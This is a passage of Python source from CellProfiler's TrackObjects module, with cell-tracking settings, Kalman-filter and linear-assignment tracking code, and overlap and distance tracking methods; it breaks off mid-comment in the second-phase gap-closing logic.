This setting acts as a filter for unreasonably large split scores. The split score has two components:
<ul>
<li>The area of the initial object relative to the area of the
two objects resulting from the split.</li>
<li>The distances between the original and resulting objects. </li>
</ul>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The LAP algorithm will run more slowly with a higher maximum split score value. </li>
<li>Objects that would have been split at a lower maximum split score will not be considered for splitting.</li>
</ul></dd>
</dl>'''%globals())
self.max_frame_distance = cps.Integer(
'Maximum temporal gap, in frames', 5, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
<b>Care must be taken to adjust this setting appropriately for the data.</b><br>
This setting controls the maximum number of frames that can
be skipped when bridging a temporal gap caused by an unsegmented object.
These gaps occur when an image is mis-segmented and identification
fails to find an object in one or more frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the maximum gap higher in order to have more chance of correctly recapturing an object after
erroneously losing the original for a few frames.</li>
<li>Set the maximum gap lower to reduce the chance of erroneously connecting to the wrong object after
correctly losing the original object (e.g., if the cell dies or moves off-screen).</li>
</ul></dd>
</dl>'''%globals())
self.wants_lifetime_filtering = cps.Binary(
'Filter objects by lifetime?', False, doc = '''
Select <i>%(YES)s</i> if you want objects to be filtered by their
lifetime, i.e., total duration in frames. This is useful for
marking objects which transiently appear and disappear, such
as the results of a mis-segmentation. <br>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>This operation does not actually delete the filtered object,
but merely removes its label from the tracked object list;
the filtered object's per-object measurements are retained.</li>
<li>An object can be filtered only if it is tracked as a unique object.
Splits continue the lifetime count from their parents, so the minimum
lifetime value does not apply to them.</li>
</ul></dd>
</dl>'''%globals())
self.wants_minimum_lifetime = cps.Binary(
'Filter using a minimum lifetime?', True, doc = '''
<i>(Used only if objects are filtered by lifetime)</i><br>
Select <i>%(YES)s</i> to filter the object on the basis of a minimum number of frames.'''%globals())
self.min_lifetime = cps.Integer(
'Minimum lifetime', 1, minval=1,doc="""
Enter the minimum number of frames an object is permitted to persist. Objects
lasting this number of frames or fewer are filtered out.""")
self.wants_maximum_lifetime = cps.Binary(
'Filter using a maximum lifetime?', False, doc = '''
<i>(Used only if objects are filtered by lifetime)</i><br>
Select <i>%(YES)s</i> to filter the object on the basis of a maximum number of frames.'''%globals())
self.max_lifetime = cps.Integer(
'Maximum lifetime', 100, doc="""
Enter the maximum number of frames an object is permitted to persist. Objects
lasting this number of frames or more are filtered out.""")
self.display_type = cps.Choice(
'Select display option', DT_ALL, doc="""
The output image can be saved as:
<ul>
<li><i>%(DT_COLOR_ONLY)s:</i> A color-labeled image, with each tracked
object assigned a unique color</li>
<li><i>%(DT_COLOR_AND_NUMBER)s:</i> Same as above but with the tracked object
number superimposed.</li>
</ul>"""%globals())
self.wants_image = cps.Binary(
"Save color-coded image?", False, doc="""
Select <i>%(YES)s</i> to retain the image showing the tracked objects
for later use in the pipeline. For example, a common use is to save the image
with the <b>SaveImages</b> module for quality control purposes.
<p>Please note that if you are using the second phase of the %(TM_LAP)s method,
the final labels are not assigned until <i>after</i> the pipeline has
completed the analysis run. That means that saving the color-coded image
will only show the penultimate result and not the final product.</p>"""%globals())
self.image_name = cps.ImageNameProvider(
"Name the output image", "TrackedCells", doc = '''
<i>(Used only if saving the color-coded image)</i><br>
Enter a name to give the color-coded image of tracked labels.''')
def settings(self):
return [self.tracking_method, self.object_name, self.measurement,
self.pixel_radius, self.display_type, self.wants_image,
self.image_name, self.model,
self.radius_std, self.radius_limit,
self.wants_second_phase,
self.gap_cost, self.split_cost, self.merge_cost,
self.max_gap_score, self.max_split_score,
self.max_merge_score, self.max_frame_distance,
self.wants_lifetime_filtering, self.wants_minimum_lifetime,
self.min_lifetime, self.wants_maximum_lifetime,
self.max_lifetime, self.mitosis_cost, self.mitosis_max_distance]
def validate_module(self, pipeline):
'''Make sure that the user has selected some limits when filtering'''
if (self.tracking_method == TM_LAP and
self.wants_lifetime_filtering.value and
(not self.wants_minimum_lifetime.value and not self.wants_maximum_lifetime.value) ):
raise cps.ValidationError(
'Please enter a minimum and/or maximum lifetime limit',
self.wants_lifetime_filtering)
def visible_settings(self):
result = [self.tracking_method, self.object_name]
if self.tracking_method == TM_MEASUREMENTS:
result += [ self.measurement]
if self.tracking_method == TM_LAP:
result += [self.model, self.radius_std, self.radius_limit]
result += [self.wants_second_phase]
if self.wants_second_phase:
result += [
self.gap_cost, self.split_cost, self.merge_cost,
self.mitosis_cost,
self.max_gap_score, self.max_split_score,
self.max_merge_score, self.max_frame_distance,
self.mitosis_max_distance]
else:
result += [self.pixel_radius]
result += [ self.wants_lifetime_filtering]
if self.wants_lifetime_filtering:
result += [ self.wants_minimum_lifetime ]
if self.wants_minimum_lifetime:
result += [ self.min_lifetime ]
result += [ self.wants_maximum_lifetime ]
if self.wants_maximum_lifetime:
result += [ self.max_lifetime ]
result +=[ self.display_type, self.wants_image]
if self.wants_image.value:
result += [self.image_name]
return result
@property
def static_model(self):
return self.model in (M_RANDOM, M_BOTH)
@property
def velocity_model(self):
return self.model in (M_VELOCITY, M_BOTH)
def get_ws_dictionary(self, workspace):
return self.get_dictionary(workspace.image_set_list)
def __get(self, field, workspace, default):
if self.get_ws_dictionary(workspace).has_key(field):
return self.get_ws_dictionary(workspace)[field]
return default
def __set(self, field, workspace, value):
self.get_ws_dictionary(workspace)[field] = value
def get_group_image_numbers(self, workspace):
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
d = self.get_ws_dictionary(workspace)
group_number = m.get_group_number()
if not d.has_key("group_number") or d["group_number"] != group_number:
d["group_number"] = group_number
group_indexes = np.array([
(m.get_measurement(cpmeas.IMAGE, cpmeas.GROUP_INDEX, i), i)
for i in m.get_image_numbers()
if m.get_measurement(cpmeas.IMAGE, cpmeas.GROUP_NUMBER, i) ==
group_number], int)
order = np.lexsort([group_indexes[:, 0]])
d["group_image_numbers"] = group_indexes[order, 1]
return d["group_image_numbers"]
def get_saved_measurements(self, workspace):
return self.__get("measurements", workspace, np.array([], float))
def set_saved_measurements(self, workspace, value):
self.__set("measurements", workspace, value)
def get_saved_coordinates(self, workspace):
return self.__get("coordinates", workspace, np.zeros((2,0), int))
def set_saved_coordinates(self, workspace, value):
self.__set("coordinates", workspace, value)
def get_orig_coordinates(self, workspace):
'''The coordinates of the first occurrence of an object's ancestor'''
return self.__get("orig coordinates", workspace, np.zeros((2,0), int))
def set_orig_coordinates(self, workspace, value):
self.__set("orig coordinates", workspace, value)
def get_saved_labels(self, workspace):
return self.__get("labels", workspace, None)
def set_saved_labels(self, workspace, value):
self.__set("labels", workspace, value)
def get_saved_object_numbers(self, workspace):
return self.__get("object_numbers", workspace, np.array([], int))
def set_saved_object_numbers(self, workspace, value):
return self.__set("object_numbers", workspace, value)
def get_saved_ages(self, workspace):
return self.__get("ages", workspace, np.array([], int))
def set_saved_ages(self, workspace, values):
self.__set("ages", workspace, values)
def get_saved_distances(self, workspace):
return self.__get("distances", workspace, np.zeros((0,)))
def set_saved_distances(self, workspace, values):
self.__set("distances", workspace, values)
def get_max_object_number(self, workspace):
return self.__get("max_object_number", workspace, 0)
def set_max_object_number(self, workspace, value):
self.__set("max_object_number", workspace, value)
def get_kalman_states(self, workspace):
return self.__get("kalman_states", workspace, None)
def set_kalman_states(self, workspace, value):
self.__set("kalman_states", workspace, value)
def prepare_group(self, workspace, grouping, image_numbers):
'''Erase any tracking information at the start of a run'''
d = self.get_dictionary(workspace.image_set_list)
d.clear()
return True
def measurement_name(self, feature):
'''Return a measurement name for the given feature'''
if self.tracking_method == TM_LAP:
return "%s_%s" % (F_PREFIX, feature)
return "%s_%s_%s" % (F_PREFIX, feature, str(self.pixel_radius.value))
def image_measurement_name(self, feature):
'''Return a measurement name for an image measurement'''
if self.tracking_method == TM_LAP:
return "%s_%s_%s" % (F_PREFIX, feature, self.object_name.value)
return "%s_%s_%s_%s" % (F_PREFIX, feature, self.object_name.value,
str(self.pixel_radius.value))
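# Illustrative examples of the names these two methods produce, assuming
# a (hypothetical) object named "Nuclei" and a pixel radius of 50:
#
#     measurement_name(F_LABEL)
#         TM_LAP:        "TrackObjects_Label"
#         other methods: "TrackObjects_Label_50"
#     image_measurement_name(F_LOST_OBJECT_COUNT)
#         TM_LAP:        "TrackObjects_LostObjectCount_Nuclei"
#         other methods: "TrackObjects_LostObjectCount_Nuclei_50"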
def add_measurement(self, workspace, feature, values):
'''Add a measurement to the workspace's measurements
workspace - current image set's workspace
feature - name of feature being measured
values - one value per object
'''
workspace.measurements.add_measurement(
self.object_name.value,
self.measurement_name(feature),
values)
def add_image_measurement(self, workspace, feature, value):
measurement_name = self.image_measurement_name(feature)
workspace.measurements.add_image_measurement(measurement_name, value)
def run(self, workspace):
objects = workspace.object_set.get_objects(self.object_name.value)
if self.tracking_method == TM_DISTANCE:
self.run_distance(workspace, objects)
elif self.tracking_method == TM_OVERLAP:
self.run_overlap(workspace, objects)
elif self.tracking_method == TM_MEASUREMENTS:
self.run_measurements(workspace, objects)
elif self.tracking_method == TM_LAP:
self.run_lapdistance(workspace, objects)
else:
raise NotImplementedError("Unimplemented tracking method: %s" %
self.tracking_method.value)
if self.wants_image.value:
import matplotlib.figure
import matplotlib.axes
import matplotlib.backends.backend_agg
import matplotlib.transforms
from cellprofiler.gui.cpfigure_tools import figure_to_image, only_display_image
figure = matplotlib.figure.Figure()
canvas = matplotlib.backends.backend_agg.FigureCanvasAgg(figure)
ax = figure.add_subplot(1,1,1)
self.draw(objects.segmented, ax,
self.get_saved_object_numbers(workspace))
#
# This is the recipe for just showing the axis
#
only_display_image(figure, objects.segmented.shape)
image_pixels = figure_to_image(figure, dpi=figure.dpi)
image = cpi.Image(image_pixels)
workspace.image_set.add(self.image_name.value, image)
if self.show_window:
workspace.display_data.labels = objects.segmented
workspace.display_data.object_numbers = \
self.get_saved_object_numbers(workspace)
def display(self, workspace, figure):
if hasattr(workspace.display_data, "labels"):
figure.set_subplots((1, 1))
subfigure = figure.figure
subfigure.clf()
ax = subfigure.add_subplot(1,1,1)
self.draw(workspace.display_data.labels, ax,
workspace.display_data.object_numbers)
else:
# We get here after running as a data tool
figure.figure.text(.5, .5, "Analysis complete",
ha="center", va="center")
def draw(self, labels, ax, object_numbers):
import matplotlib
indexer = np.zeros(len(object_numbers)+1,int)
indexer[1:] = object_numbers
#
# We want to keep the colors stable, but we also want the
# largest possible separation between adjacent colors. So, here
# we reverse the significance of the bits in the indices so
# that adjacent numbers (e.g. 0 and 1) differ by roughly 128
#
pow_of_2 = 2**np.mgrid[0:8,0:len(indexer)][0]
bits = (indexer & pow_of_2).astype(bool)
indexer = np.sum(bits.transpose() * (2 ** np.arange(7,-1,-1)), 1)
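# A minimal sketch of the bit-reversal above (illustrative values):
#
#     >>> idx = np.array([0, 1, 2, 3])
#     >>> bits = (idx[:, np.newaxis] & 2 ** np.arange(8)).astype(bool)
#     >>> np.sum(bits * 2 ** np.arange(7, -1, -1), 1)
#     array([  0, 128,  64, 192])
#
# so consecutive labels land far apart in the 256-entry colormap.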
recolored_labels = indexer[labels]
cm = matplotlib.cm.get_cmap(cpprefs.get_default_colormap())
cm.set_bad((0,0,0))
norm = matplotlib.colors.BoundaryNorm(range(256), 256)
img = ax.imshow(numpy.ma.array(recolored_labels, mask=(labels==0)),
cmap=cm, norm=norm)
if self.display_type == DT_COLOR_AND_NUMBER:
i,j = centers_of_labels(labels)
for n, x, y in zip(object_numbers, j, i):
if np.isnan(x) or np.isnan(y):
# This happens if there are missing labels
continue
ax.annotate(str(n), xy=(x,y),color='white',
arrowprops=dict(visible=False))
def run_distance(self, workspace, objects):
'''Track objects based on distance'''
old_i, old_j = self.get_saved_coordinates(workspace)
if len(old_i):
distances, (i,j) = distance_transform_edt(objects.segmented == 0,
return_indices=True)
#
# Look up the coordinates of the nearest new object (given by
# the transform i,j), then look up the label at that coordinate
# (objects.segmented[#,#])
#
new_object_numbers = objects.segmented[i[old_i, old_j],
j[old_i, old_j]]
#
# Mask out any objects at too great of a distance
#
new_object_numbers[distances[old_i, old_j] >
self.pixel_radius.value] = 0
#
# Do the same with the new centers and old objects
#
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
old_labels = self.get_saved_labels(workspace)
distances, (old_i,old_j) = distance_transform_edt(
old_labels == 0,
return_indices=True)
old_object_numbers = old_labels[old_i[i, j],
old_j[i, j]]
old_object_numbers[distances[i, j] > self.pixel_radius.value] = 0
self.map_objects(workspace,
new_object_numbers,
old_object_numbers,
i,j)
else:
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
self.set_saved_labels(workspace, objects.segmented)
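# A minimal sketch of the distance-transform lookup used above
# (illustrative values):
#
#     >>> labels = np.array([[1, 0, 0],
#     ...                    [0, 0, 0],
#     ...                    [0, 0, 2]])
#     >>> dist, (i, j) = distance_transform_edt(labels == 0,
#     ...                                       return_indices=True)
#     >>> labels[i[1, 0], j[1, 0]]  # label of the object nearest pixel (1, 0)
#     1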
def run_lapdistance(self, workspace, objects):
'''Track objects based on distance'''
m = workspace.measurements
old_i, old_j = self.get_saved_coordinates(workspace)
n_old = len(old_i)
#
# Automatically set the cost of birth and death above
# that of the largest allowable cost.
#
costBorn = costDie = self.radius_limit.max * 1.10
kalman_states = self.get_kalman_states(workspace)
if kalman_states is None:
if self.static_model:
kalman_states = [ cpfilter.static_kalman_model()]
else:
kalman_states = []
if self.velocity_model:
kalman_states.append(cpfilter.velocity_kalman_model())
areas = fix(scipy.ndimage.sum(
np.ones(objects.segmented.shape), objects.segmented,
np.arange(1, np.max(objects.segmented) + 1,dtype=np.int32)))
areas = areas.astype(int)
model_types = np.array(
[m for m, s in ((KM_NO_VEL, self.static_model),
(KM_VEL, self.velocity_model)) if s], int)
if n_old > 0:
new_i, new_j = centers_of_labels(objects.segmented)
n_new = len(new_i)
i,j = np.mgrid[0:n_old, 0:n_new]
##############################
#
# Kalman filter prediction
#
#
# We take the lowest cost among all possible models
#
minDist = np.ones((n_old, n_new)) * self.radius_limit.max
d = np.ones((n_old, n_new)) * np.inf
sd = np.zeros((n_old, n_new))
# The index of the Kalman filter used: -1 means not used
kalman_used = -np.ones((n_old, n_new), int)
for nkalman, kalman_state in enumerate(kalman_states):
assert isinstance(kalman_state, cpfilter.KalmanState)
obs = kalman_state.predicted_obs_vec
dk = np.sqrt((obs[i,0] - new_i[j])**2 +
(obs[i,1] - new_j[j])**2)
noise_sd = np.sqrt(np.sum(kalman_state.noise_var[:,0:2], 1))
radius = np.maximum(np.minimum(noise_sd * self.radius_std.value,
self.radius_limit.max),
self.radius_limit.min)
is_best = ((dk < d) & (dk < radius[:, np.newaxis]))
d[is_best] = dk[is_best]
minDist[is_best] = radius[i][is_best]
kalman_used[is_best] = nkalman
minDist = np.maximum(np.minimum(minDist, self.radius_limit.max),
self.radius_limit.min)
#
#############################
#
# Linear assignment setup
#
n = len(old_i)+len(new_i)
kk = np.zeros((n+10)*(n+10), np.int32)
first = np.zeros(n+10, np.int32)
cc = np.zeros((n+10)*(n+10), np.float)
t = np.argwhere((d < minDist))
x = np.sqrt((old_i[t[0:t.size, 0]]-new_i[t[0:t.size, 1]])**2 + (old_j[t[0:t.size, 0]]-new_j[t[0:t.size, 1]])**2)
t = t+1
t = np.column_stack((t, x))
a = np.arange(len(old_i))+2
x = np.searchsorted(t[0:(t.size/2),0], a)
a = np.arange(len(old_i))+1
b = np.arange(len(old_i))+len(new_i)+1
c = np.zeros(len(old_i))+costDie
b = np.column_stack((a, b, c))
t = np.insert(t, x, b, 0)
i,j = np.mgrid[0:len(new_i),0:len(old_i)+1]
i = i+len(old_i)+1
j = j+len(new_i)
j[0:len(new_i)+1,0] = i[0:len(new_i)+1,0]-len(old_i)
x = np.zeros((len(new_i),len(old_i)+1))
x[0:len(new_i)+1,0] = costBorn
i = i.flatten()
j = j.flatten()
x = x.flatten()
x = np.column_stack((i, j, x))
t = np.vstack((t, x))
# Tack 0 <-> 0 at the start because object #s start at 1
i = np.hstack([0,t[:,0].astype(int)])
j = np.hstack([0,t[:,1].astype(int)])
c = np.hstack([0,t[:,2]])
x, y = lapjv(i, j, c)
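# As used here, lapjv takes the assignment problem in sparse coordinate
# form -- row indices i, column indices j and a cost c for each allowed
# pairing -- and returns the optimal assignment both ways: x[row] is the
# column matched to that row and y[col] the row matched to that column.
# Assignments to the birth/death alternatives are zeroed out below.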
a = np.argwhere(x > len(new_i))
b = np.argwhere(y >len(old_i))
x[a[0:len(a)]] = 0
y[b[0:len(b)]] = 0
a = np.arange(len(old_i))+1
b = np.arange(len(new_i))+1
new_object_numbers = x[a[0:len(a)]].astype(int)
old_object_numbers = y[b[0:len(b)]].astype(int)
###############################
#
# Kalman filter update
#
model_idx = np.zeros(len(old_object_numbers), int)
linking_distance = np.ones(len(old_object_numbers)) * np.NaN
standard_deviation = np.ones(len(old_object_numbers)) * np.NaN
model_type = np.ones(len(old_object_numbers), int) * KM_NONE
link_type = np.ones(len(old_object_numbers), int) * LT_NONE
mask = old_object_numbers > 0
old_idx = old_object_numbers - 1
model_idx[mask] =\
kalman_used[old_idx[mask], mask]
linking_distance[mask] = d[old_idx[mask], mask]
standard_deviation[mask] = \
linking_distance[mask] / noise_sd[old_idx[mask]]
model_type[mask] = model_types[model_idx[mask]]
link_type[mask] = LT_PHASE_1
#
# The measurement covariance is the square of the
# standard deviation of the measurement error. Assume
# that the measurement error comes from not knowing where
# the center is within the cell; then the error is
# proportional to the radius, and its square to the area.
#
measurement_variance = areas.astype(float) / np.pi
#
# Broadcast the measurement error into a diagonal matrix
#
r = (measurement_variance[:, np.newaxis, np.newaxis] *
np.eye(2)[np.newaxis,:,:])
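# For a circular object, area = pi * r**2, so area / pi = r**2: the
# measurement variance used above is the squared radius, i.e. the
# positional error is assumed to be about one radius.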
new_kalman_states = []
for kalman_state in kalman_states:
#
# The process noise covariance is a diagonal of the
# state noise variance.
#
state_len = kalman_state.state_len
q = np.zeros((len(old_idx), state_len, state_len))
if np.any(mask):
#
# Broadcast into the diagonal
#
new_idx = np.arange(len(old_idx))[mask]
matching_idx = old_idx[new_idx]
i,j = np.mgrid[0:len(matching_idx),0:state_len]
q[new_idx[i], j, j] = \
kalman_state.noise_var[matching_idx[i],j]
new_kalman_state = cpfilter.kalman_filter(
kalman_state,
old_idx,
np.column_stack((new_i, new_j)),
q,r)
new_kalman_states.append(new_kalman_state)
self.set_kalman_states(workspace, new_kalman_states)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
self.map_objects(workspace,
new_object_numbers,
old_object_numbers,
i,j)
else:
i,j = centers_of_labels(objects.segmented)
count = len(i)
link_type = np.ones(count, int) * LT_NONE
model_type = np.ones(count, int) * KM_NONE
linking_distance = np.ones(count) * np.NaN
standard_deviation = np.ones(count) * np.NaN
#
# Initialize the kalman_state with the new objects
#
new_kalman_states = []
r = np.zeros((count, 2, 2))
for kalman_state in kalman_states:
q = np.zeros((count, kalman_state.state_len, kalman_state.state_len))
new_kalman_state = cpfilter.kalman_filter(
kalman_state, -np.ones(count),
np.column_stack((i,j)), q, r)
new_kalman_states.append(new_kalman_state)
self.set_kalman_states(workspace, new_kalman_states)
i = (i+.5).astype(int)
j = (j+.5).astype(int)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
m.add_measurement(self.object_name.value,
self.measurement_name(F_AREA),
areas)
m[self.object_name.value,
self.measurement_name(F_LINKING_DISTANCE)] = linking_distance
m[self.object_name.value,
self.measurement_name(F_STANDARD_DEVIATION)] = standard_deviation
m[self.object_name.value,
self.measurement_name(F_MOVEMENT_MODEL)] = model_type
m[self.object_name.value,
self.measurement_name(F_LINK_TYPE)] = link_type
self.save_kalman_measurements(workspace)
self.set_saved_labels(workspace, objects.segmented)
def get_kalman_models(self):
'''Return tuples of model and names of the vector elements'''
if self.static_model:
models = [ (F_STATIC_MODEL, (F_Y, F_X))]
else:
models = []
if self.velocity_model:
models.append((F_VELOCITY_MODEL, (F_Y, F_X, F_VY, F_VX)))
return models
def save_kalman_measurements(self, workspace):
'''Save the first-pass state_vec, state_cov and state_noise'''
m = workspace.measurements
object_name = self.object_name.value
for (model, elements), kalman_state in zip(
self.get_kalman_models(), self.get_kalman_states(workspace)):
assert isinstance(kalman_state, cpfilter.KalmanState)
nobjs = len(kalman_state.state_vec)
if nobjs > 0:
#
# Get the last state_noise entry for each object
#
# scipy.ndimage.maximum probably should return NaN if
# no index exists, but, in 0.8.0, returns 0. So stack
# a bunch of -1 values so every object will have a "-1"
# index.
last_idx = scipy.ndimage.maximum(
np.hstack((
-np.ones(nobjs),
np.arange(len(kalman_state.state_noise_idx)))),
np.hstack((
np.arange(nobjs), kalman_state.state_noise_idx)),
np.arange(nobjs))
last_idx = last_idx.astype(int)
for i, element in enumerate(elements):
#
# state_vec
#
mname = self.measurement_name(
kalman_feature(model, F_STATE, element))
values = np.zeros(0) if nobjs == 0 else kalman_state.state_vec[:,i]
m.add_measurement(object_name, mname, values)
#
# state_noise
#
mname = self.measurement_name(
kalman_feature(model, F_NOISE, element))
values = np.zeros(nobjs)
if nobjs > 0:
values[last_idx == -1] = np.NaN
values[last_idx > -1] = kalman_state.state_noise[last_idx[last_idx > -1], i]
m.add_measurement(object_name, mname, values)
#
# state_cov
#
for j, el2 in enumerate(elements):
mname = self.measurement_name(
kalman_feature(model, F_COV, element, el2))
values = kalman_state.state_cov[:, i, j]
m.add_measurement(object_name, mname, values)
def run_overlap(self, workspace, objects):
'''Track objects by maximum # of overlapping pixels'''
current_labels = objects.segmented
old_labels = self.get_saved_labels(workspace)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
if old_labels is None:
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
else:
mask = ((current_labels > 0) & (old_labels > 0))
cur_count = np.max(current_labels)
old_count = np.max(old_labels)
count = np.sum(mask)
if count == 0:
# There's no overlap.
self.map_objects(workspace,
np.zeros(old_count, int),
np.zeros(cur_count,int),
i,j)
else:
cur = current_labels[mask]
old = old_labels[mask]
histogram = scipy.sparse.coo_matrix(
(np.ones(count),(cur, old)),
shape=(cur_count+1,old_count+1)).toarray()
old_of_new = np.argmax(histogram, 1)[1:]
new_of_old = np.argmax(histogram, 0)[1:]
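# Sketch of the histogram trick (illustrative values): a single
# overlapping pixel between current label 1 and old label 2 gives
#
#     >>> h = scipy.sparse.coo_matrix(
#     ...     (np.ones(1), (np.array([1]), np.array([2]))),
#     ...     shape=(2, 3)).toarray()
#     >>> np.argmax(h, 1)[1:]  # best old match per current label
#     array([2])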
#
# The cast here seems to be needed to make scipy.ndimage.sum
# work. See http://projects.scipy.org/numpy/ticket/1012
#
old_of_new = np.array(old_of_new, np.int16)
old_of_new = np.array(old_of_new, np.int32)
new_of_old = np.array(new_of_old, np.int16)
new_of_old = np.array(new_of_old, np.int32)
self.map_objects(workspace,
new_of_old,
old_of_new,
i,j)
self.set_saved_labels(workspace, current_labels)
def run_measurements(self, workspace, objects):
current_labels = objects.segmented
new_measurements = workspace.measurements.get_current_measurement(
self.object_name.value,
self.measurement.value)
old_measurements = self.get_saved_measurements(workspace)
old_labels = self.get_saved_labels(workspace)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
if old_labels is None:
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
else:
associations = associate_by_distance(old_labels, current_labels,
self.pixel_radius.value)
best_child = np.zeros(len(old_measurements), int)
best_parent = np.zeros(len(new_measurements), int)
best_child_measurement = (np.ones(len(old_measurements), int) *
np.finfo(float).max)
best_parent_measurement = (np.ones(len(new_measurements), int) *
np.finfo(float).max)
for old, new in associations:
diff = abs(old_measurements[old-1] - new_measurements[new-1])
if diff < best_child_measurement[old-1]:
best_child[old-1] = new
best_child_measurement[old-1] = diff
if diff < best_parent_measurement[new-1]:
best_parent[new-1] = old
best_parent_measurement[new-1] = diff
self.map_objects(workspace, best_child, best_parent, i,j)
self.set_saved_labels(workspace,current_labels)
self.set_saved_measurements(workspace, new_measurements)
def run_as_data_tool(self, workspace):
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
group_numbers = {}
for i in m.get_image_numbers():
group_number = m.get_measurement(cpmeas.IMAGE,
cpmeas.GROUP_NUMBER, i)
group_index = m.get_measurement(cpmeas.IMAGE,
cpmeas.GROUP_INDEX, i)
if ((not group_numbers.has_key(group_number)) or
(group_numbers[group_number][1] > group_index)):
group_numbers[group_number] = (i, group_index)
for group_number in sorted(group_numbers.keys()):
m.image_set_number = group_numbers[group_number][0]
self.post_group(workspace, {})
def flood(self, i, at, a, b, c, d, z):
'''Recursively flood-fill group number "at" through the link arrays
a, b, c and d starting at node i (-1 means no link; z holds each
node's group number, with 0 marking unvisited nodes)'''
z[i] = at
if(a[i] != -1 and z[a[i]] == 0):
z = self.flood(a[i], at, a, b, c, d, z)
if(b[i] != -1 and z[b[i]] == 0):
z = self.flood(b[i], at, a, b, c, d, z)
if(c[i] != -1 and z[c[i]] == 0):
z = self.flood(c[i], at, a, b, c, d, z)
if(d[i] != -1 and z[d[i]] == 0):
z = self.flood(d[i], at, a, b, c, d, z)
return z
def is_aggregation_module(self):
'''We connect objects across imagesets within a group = aggregation'''
return True
def post_group(self, workspace, grouping):
# If any tracking method other than LAP, recalculate measurements
# (Really, only the final age needs to be re-done)
if self.tracking_method != TM_LAP:
m = workspace.measurements
assert(isinstance(m, cpmeas.Measurements))
image_numbers = self.get_group_image_numbers(workspace)
self.recalculate_group(workspace, image_numbers)
return
if not self.wants_second_phase:
return
gap_cost = float(self.gap_cost.value)
split_alternative_cost = float(self.split_cost.value) / 2
merge_alternative_cost = float(self.merge_cost.value)
mitosis_alternative_cost = float(self.mitosis_cost.value)
max_gap_score = self.max_gap_score.value
max_merge_score = self.max_merge_score.value
max_split_score = self.max_split_score.value / 2 # to match legacy
max_frame_difference = self.max_frame_distance.value
m = workspace.measurements
assert(isinstance(m, cpmeas.Measurements))
image_numbers = self.get_group_image_numbers(workspace)
object_name = self.object_name.value
label, object_numbers, a, b, Area, \
parent_object_numbers, parent_image_numbers = [
[m.get_measurement(object_name, feature, i).astype(mtype)
for i in image_numbers]
for feature, mtype in (
(self.measurement_name(F_LABEL), int),
(cpmeas.OBJECT_NUMBER, int),
(M_LOCATION_CENTER_X, float),
(M_LOCATION_CENTER_Y, float),
(self.measurement_name(F_AREA), float),
(self.measurement_name(F_PARENT_OBJECT_NUMBER), int),
(self.measurement_name(F_PARENT_IMAGE_NUMBER), int)
)]
group_indices, new_object_count, lost_object_count, merge_count, \
split_count = [
np.array([m.get_measurement(cpmeas.IMAGE, feature, i)
for i in image_numbers], int)
for feature in (cpmeas.GROUP_INDEX,
self.image_measurement_name(F_NEW_OBJECT_COUNT),
self.image_measurement_name(F_LOST_OBJECT_COUNT),
self.image_measurement_name(F_MERGE_COUNT),
self.image_measurement_name(F_SPLIT_COUNT))]
#
# Map image number to group index and vice versa
#
image_number_group_index = np.zeros(np.max(image_numbers) + 1, int)
image_number_group_index[image_numbers] = np.array(group_indices, int)
group_index_image_number = np.zeros(np.max(group_indices) + 1, int)
group_index_image_number[group_indices] = image_numbers
if all([len(lll) == 0 for lll in label]):
return # Nothing to do
#sets up the arrays F, L, P, and Q
#F is an array of all the cells that are the starts of segments
# F[:, :2] are the coordinates
# F[:, 2] is the image index
# F[:, 3] is the object index
# F[:, 4] is the object number
# F[:, 5] is the label
# F[:, 6] is the area
# F[:, 7] is the index into P
#L is the ends
#P includes all cells
X = 0
Y = 1
IIDX = 2
OIIDX = 3
ONIDX = 4
LIDX = 5
AIDX = 6
PIDX = 7
P = np.vstack([
np.column_stack((x, y, np.ones(len(x)) * i, np.arange(len(x)),
o, l, area, np.zeros(len(x))))
for i, (x, y, o, l, area)
in enumerate(zip(a, b, object_numbers, label, Area))])
count_per_label = np.bincount(P[:, LIDX].astype(int))
idx = np.hstack([0, np.cumsum(count_per_label)])
unique_label = np.unique(P[:, LIDX].astype(int))
order = np.lexsort((P[:, OIIDX], P[:, IIDX], P[:, LIDX]))
P = P[order, :]
P[:, PIDX] = np.arange(len(P))
F = P[idx[unique_label], :]
L = P[idx[unique_label + 1] - 1, :]
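# After the lexsort, each track occupies a contiguous slice of P:
# idx[k] is the offset of label k's first point, so F holds the first
# point of every track and L the last.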
# Creates P1 and P2, which are P without the starts and ends
# of segments respectively, representing possible
# points of merges and splits respectively
P1 = np.delete(P, idx[:-1], 0)
P2 = np.delete(P, idx[1:] - 1, 0)
##################################################
#
# Addresses of supplementary nodes:
#
# The LAP array is composed of the following ranges
#
# Count | node type
# ------------------
# T | segment starts and ends
# T | gaps
# OB | split starts
# OB | merge ends
# M | mitoses
#
# T = # tracks
# OB = # of objects that can serve as merge or split points
# M = # of mitoses
#
# The graph:
#
# Gap Alternatives (in other words, do nothing)
# ----------------------------------------------
# End[i] <----> Gap alternative[i]
# Gap alternative[i] <----> Start[i]
# Split[i] <----> Split[i]
# Merge[j] <----> Merge[j]
# Mitosis[i] <----> Mitosis[i]
#
#
# Bridge gaps:
# -----------------------------------------------
#
# End[i] <---> Start[j]
# Gap alternative[i] <----> Gap alternative[j]
#
# Splits
# -----------------------------------------------
#
# Split[i] <----> Start[j]
# Gap alternative[j] <----> Split[i]
#
# Merges
# -----------------------------------------------
# End[i] <----> Merge[j]
# Merge[j] <----> Gap alternative[i]
#
# Mitoses
# -----------------------------------------------
# The mitosis model is somewhat imperfect. The mitosis
